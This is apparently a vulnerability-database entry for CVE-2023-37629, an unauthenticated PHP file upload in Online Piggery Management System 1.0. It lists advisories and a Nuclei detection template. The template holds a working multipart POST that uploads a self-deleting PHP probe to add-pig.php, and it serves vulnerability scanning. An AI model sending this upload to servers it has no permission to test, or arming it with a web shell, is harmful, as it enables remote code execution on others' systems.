| Title | Published | Views | Family |
|---|---|---|---|
| Online Piggery Management System v1.0 - unauthenticated file upload Vulnerability | 19 Jul 2023 00:00 | – | zdt |
| Exploit for SQL Injection in Simple_Online_Piggery_Management_System_Project Simple_Online_Piggery_Management_System | 9 Sep 2023 07:37 | – | githubexploit |
| CVE-2023-37629 | 12 Jul 2023 17:15 | – | attackerkb |
| CVE-2023-37629 | 12 Jul 2023 20:26 | – | circl |
| Online Piggery Management System code issue vulnerability | 12 Jul 2023 00:00 | – | cnnvd |
| Online Piggery Management System Arbitrary File Upload Vulnerability | 14 Jul 2023 00:00 | – | cnvd |
| CVE-2023-37629 | 12 Jul 2023 00:00 | – | cve |
| CVE-2023-37629 | 12 Jul 2023 00:00 | – | cvelist |
| Online Piggery Management System v1.0 - unauthenticated file upload vulnerability | 19 Jul 2023 00:00 | – | exploitdb |
| CVE-2023-37629 | 12 Jul 2023 17:15 | – | nvd |
```yaml
id: CVE-2023-37629

info:
  name: Online Piggery Management System v1.0 - Unauthenticated File Upload
  author: Harsh
  severity: critical
  description: |
    Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access to the system, data leakage, or even complete compromise of the affected server.
  reference:
    - https://www.exploit-db.com/exploits/51598
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37629
    - https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
    - https://github.com/1337kid/Piggery_CMS_multiple_vulns_PoC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37629
    cwe-id: CWE-434
    epss-score: 0.15033
    epss-percentile: 0.96316
    cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: simple_online_piggery_management_system_project
    product: simple_online_piggery_management_system
  tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project,vuln

variables:
  string: "CVE-2023-37629"

http:
  - raw:
      - |
        POST /pig/add-pig.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP

        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="pigno"

        pig-fms-100
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="weight"

        65465
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="arrived"

        {{date_time("%Y-%M-%D")}}
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="gender"

        female
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="status"

        active
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="breed"

        2
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="remark"

        4fwefwe
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}.php"
        Content-Type: application/x-php

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
        Content-Disposition: form-data; name="submit"


        -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "successfully created")'
        condition: and
# digest: 4b0a00483046022100a3cd7ae8f63ea52d39f4941e72872ed8761fc03b34c8fdf596369f29d894edb9022100d5e51be7fe53d70557756702a4461479d4ccabdccd3455837fc0bc200da513c6:922c64590222798bb761d5b6d8e72950
```